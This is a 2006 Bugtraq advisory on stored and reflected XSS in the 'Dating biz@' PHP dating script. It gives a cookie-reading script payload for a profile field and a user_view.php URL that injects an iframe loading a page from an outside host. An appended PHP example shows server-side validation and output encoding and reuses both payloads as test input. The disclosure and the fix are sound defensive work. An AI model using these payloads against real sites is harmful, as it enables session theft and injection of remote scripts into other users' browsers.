List: bugtraq
Subject: Dating biz@ dating script v1.0 - XSS
From: luny () youfucktard ! com
Date: 2006-06-22 23:13:20
Message-ID: 20060622231320.4328.qmail () securityfocus ! com
Custom dating biz@ dating script v1.0
Homepage:
http://www.e-cbd.biz/php_dating_script.html
Affected files:
*Profiles
user_view.php
photo_create.php
---------------------------------
The edit profile form can be spoofed and a user can enter any data he wishes and it
will update his profile. The "Choose an opening like and People say you look like"
input boxes are the only ones that, when entered, will be reviewed by the site's admin.
Max char limit stored in the db for each profile box appears to be 36 chars EXCEPT
for the input box "Special Cases". This box is where I will
display our XSS example with the cookie info.
PoC:
<script>alert(document.cookie)</script>
Screenshots:
http://www.youfucktard.com/xsp/ebizdate1.jpg
http://www.youfucktard.com/xsp/ebizdate2.jpg
http://www.youfucktard.com/xsp/ebizdate3.jpg
-----------------------------------
XSS vuln via user_view.php:
http://www.example.com/user_view.php?u=<iframe%20src=http://ha.ckers.org/scriptlet.html>
----------------------------------
XSS vuln on photo_create.php.
Max char limit stored in db is only 32, but data isn't sanitized.
---------------------------------
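Server-side handling that addresses the three issues reported above, as an added example that is not code from the Dating biz script or from the original post: length and field checks that do not rely on the HTML form, HTML-encoding of stored profile text at output time, and an allow-list check of the `u` parameter. The field names, the limits in `FIELD_MAX`, the function names and the assumption that `u` is an alphanumeric user id are all hypothetical.

```php
<?php
declare(strict_types=1);

// Assumed per-field limits (constructed values, not from the script). They are
// enforced on the server because a spoofed copy of the form ignores maxlength.
const FIELD_MAX = ['special_cases' => 200, 'photo_title' => 32];

// Reject unknown fields, malformed UTF-8, control characters and over-long values.
function validate_profile_field(string $name, string $value): string
{
    if (!array_key_exists($name, FIELD_MAX)) {
        throw new InvalidArgumentException("unexpected field: $name");
    }
    if (!mb_check_encoding($value, 'UTF-8')
        || preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', $value) === 1) {
        throw new InvalidArgumentException("invalid characters in $name");
    }
    if (mb_strlen($value, 'UTF-8') > FIELD_MAX[$name]) {
        throw new InvalidArgumentException("$name exceeds " . FIELD_MAX[$name] . ' chars');
    }
    return $value; // stored unchanged; encoding is applied when the value is rendered
}

// Encode for an HTML text or quoted-attribute context.
function e(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept the u= parameter only if it matches the assumed user-id format.
function parse_user_param($raw): ?string
{
    $ok = is_string($raw) && preg_match('/\A[A-Za-z0-9_]{1,36}\z/', $raw) === 1;
    return $ok ? $raw : null;
}

// Demo input: the two strings quoted in the advisory, used here as test data.
$stored = validate_profile_field('special_cases', '<script>alert(document.cookie)</script>');
echo '<td>' . e($stored) . "</td>\n"; // markup is rendered as inert text

$u = parse_user_param('<iframe src=http://ha.ckers.org/scriptlet.html>');
echo $u === null ? "400: invalid user id\n" : 'Profile of ' . e($u) . "\n";
```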